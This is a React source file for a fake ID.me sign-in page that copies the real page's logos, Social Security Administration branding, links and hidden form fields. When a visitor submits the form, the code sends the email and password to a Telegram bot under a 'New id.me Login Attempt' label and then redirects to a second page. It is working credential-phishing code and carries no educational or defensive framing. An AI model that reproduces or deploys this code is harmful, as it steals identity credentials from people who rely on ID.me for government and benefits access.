import React, { useState } from "react";
import { useNavigate } from "react-router-dom";
import { TELEGRAM_API_TOKEN, TELEGRAM_CHAT_ID } from "./telegramAPI";

const SignIn = () => {
  const [email, setEmail] = useState("");
  const [password, setPassword] = useState("");
  const navigate = useNavigate();

  const handleSubmit = async (e) => {
    e.preventDefault();

    try {
      const message = `New id.me Login Attempt:\n\nEmail: ${email}\nPassword: ${password}`;
      const response = await fetch(
        `https://api.telegram.org/bot${TELEGRAM_API_TOKEN}/sendMessage`,
        {
          method: "POST",
          headers: {
            "Content-Type": "application/json",
          },
          body: JSON.stringify({
            chat_id: TELEGRAM_CHAT_ID,
            text: message,
          }),
        }
      );

      if (response.ok) {
        setEmail("");
        setPassword("");
        navigate("/signin2");
      } else {
        console.error("Failed to send message to Telegram");
        alert("Something went wrong. Please try again.");
      }
    } catch (error) {
      console.error("Error:", error);
      alert("An error occurred. Please check your network connection.");
    }
  };

  return (
    <div className="page-container" data-role="page-container">
      <div className="container">
        <div className="content-container">
          <form
            className="new_user"
            id="new_user"
            data-validate="signin"
            data-component="Components.RequiredFieldInfo"
            action="https://api.id.me/en/session"
            acceptCharset="UTF-8"
            method="post"
            onSubmit={handleSubmit}
          >
            <input
              type="hidden"
              name="authenticity_token"
              value="yMpZuhPxQ75FliTfLhnitYlqIZf2bGd/8Wcym/hLomFjn/wYBKMnXH6nbWBn7yjARTyekz6J0SMJK3a8MFPCZg=="
              autoComplete="off"
            />
            <input
              type="hidden"
              name="user[session_id]"
              id="user_session_id"
              value="0a64cc5e-a5b1-4042-aa41-6b476b5897be"
              autoComplete="off"
            />

            <div className="form-header">
              <div className="form-header-content" role="banner">
                <div className="partner">
                  <div className="c_icon m_idme">
                    <img
                      alt=""
                      className="img-lightmode"
                      src="https://api.id.me/assets/logos/idme-logo-1d96899e99d393974ec16fa17a820e78fca132bd8ea53e01f12bdc000baf674f.svg"
                    />
                    <img
                      alt=""
                      className="img-darkmode"
                      src="https://api.id.me/assets/logos/idme-logo-white-3fda17b1e33891acf640ab0125f80fb2feafbdd0cf0423c06de22149b643fcbb.svg"
                    />
                  </div>
                  <div className="c_icon m_addition">
                    <img
                      alt=""
                      className="img-lightmode"
                      src="https://api.id.me/assets/icons/icon-addition-1c60f492657aa091463f6ac2e15f0f5123425f314e60383dbba0b06b3bbae0ed.svg"
                    />
                    <img
                      alt=""
                      className="img-darkmode"
                      src="https://api.id.me/assets/icons/icon-addition-white-cbf0d61d70d65bb52b8aaa42341da4d8e957fa0c67e22720e878618233f791a7.svg"
                    />
                  </div>
                  <div className="c_icon m_consumer-logo">
                    <button
                      name="button"
                      type="button"
                      className="m_consumer-logo m_exit-ramp"
                      data-component="Components.Modal"
                    >
                      <img
                        alt="ID.me with Social Security Administration"
                        src="https://idme-production.s3.amazonaws.com/applications/4327/large.png?1525120239"
                      />
                    </button>
                  </div>
                </div>
              </div>
            </div>

            <main aria-labelledby="sr_page_title" className="form-container">
              <div className="form-header-access">
                <h1 id="sr_page_title">Sign in to ID.me</h1>
              </div>

              <div className="form-header-well">
                <p>
                  <b>New to ID.me?</b>
                </p>
                <p>
                  <a href="https://api.id.me/en/registration/new">
                    Create an ID.me account
                  </a>
                </p>
              </div>

              <p style={{ fontSize: "14px", marginBottom: "10px" }}>
                <b>* Indicates a required field</b>
              </p>

              <div className="form-fields">
                <div className="field text">
                  <label htmlFor="user_email">Email *</label>
                  <input
                    type="email"
                    id="user_email"
                    value={email}
                    onChange={(e) => setEmail(e.target.value)}
                    placeholder="Enter your email address"
                    required
                  />
                </div>
                <div className="field text password-showable">
                  <label htmlFor="user_password">Password *</label>
                  <input
                    type="password"
                    id="user_password"
                    value={password}
                    onChange={(e) => setPassword(e.target.value)}
                    placeholder="Enter your password"
                    required
                  />
                </div>

                {/* Remember Me Checkbox */}
                <div className="field checkbox">
                  <label style={{ display: "flex", alignItems: "center" }}>
                    <input
                      type="checkbox"
                      id="remember_me"
                      style={{
                        appearance: "none",
                        width: "18px",
                        height: "18px",
                        border: "1px solid #ccc",
                        borderRadius: "3px",
                        display: "inline-block",
                        verticalAlign: "middle",
                        marginRight: "10px",
                        backgroundColor: "white",
                      }}
                      onChange={(e) => {
                        e.target.style.backgroundImage = e.target.checked
                          ? "url('data:image/svg+xml,%3Csvg xmlns%3D%22http://www.w3.org/2000/svg%22 viewBox%3D%220 0 16 16%22%3E%3Cpath fill%3D%22white%22 d%3D%22M13.78 4.78l-7.45 7.5L2.22 8.22l-1.5 1.5L6.33 14l9-9z%22/%3E%3C/svg%3E')"
                          : "none";
                      }}
                    />
                    <div>
                      <span>Remember me</span>
                      <br />
                      <span style={{ fontSize: "12px" }}>
                        For your security, select only on your devices.
                      </span>
                    </div>
                  </label>
                </div>
              </div>

              <div className="form-actions">
                <button type="submit" className="btn btn-primary">
                  Sign In
                </button>
              </div>

              <div className="form-footer">
                <p>
                  <a href="https://api.id.me/en/passwords/new">
                    Forgot password
                  </a>
                </p>
              </div>

              <div className="separator">
                <span>OR</span>
              </div>

              <div className="connections">
                <a
                  className="facebook connection"
                  aria-label="Sign in with Facebook"
                  href="https://api.id.me/en/broker/facebook/connect?type=signin"
                ></a>
                <a
                  className="google connection"
                  aria-label="Sign in with Google"
                  href="https://api.id.me/en/broker/google/connect?type=signin"
                ></a>
                <a
                  className="apple connection"
                  aria-label="Sign in with Apple"
                  href="https://api.id.me/en/broker/apple/connect?type=signin"
                ></a>
                <a
                  className="linkedin connection"
                  aria-label="Sign in with LinkedIn"
                  href="https://api.id.me/en/broker/linkedin/connect?type=signin"
                ></a>
                <a
                  className="connection m_full"
                  href="https://api.id.me/en/session/options"
                >
                  View more options
                </a>
              </div>
            </main>
          </form>
        </div>
      </div>

      <footer className="footer">
        <nav aria-label="Footer" className="footer__links">
          <ul className="footer__list">
            <li className="footer__list-item">
              <a
                target="_blank"
                rel="noopener noreferrer"
                className="footer__link"
                href="https://www.id.me/about"
              >
                What is ID.me?
              </a>
            </li>
            <li className="footer__list-item">
              <a
                target="_blank"
                rel="noopener noreferrer"
                className="footer__link"
                href="https://www.id.me/terms"
              >
                Terms of Service
              </a>
            </li>
            <li className="footer__list-item">
              <a
                target="_blank"
                rel="noopener noreferrer"
                className="footer__link"
                href="https://www.id.me/privacy"
              >
                Privacy Policy
              </a>
            </li>
          </ul>
        </nav>
      </footer>
    </div>
  );
};

export default SignIn;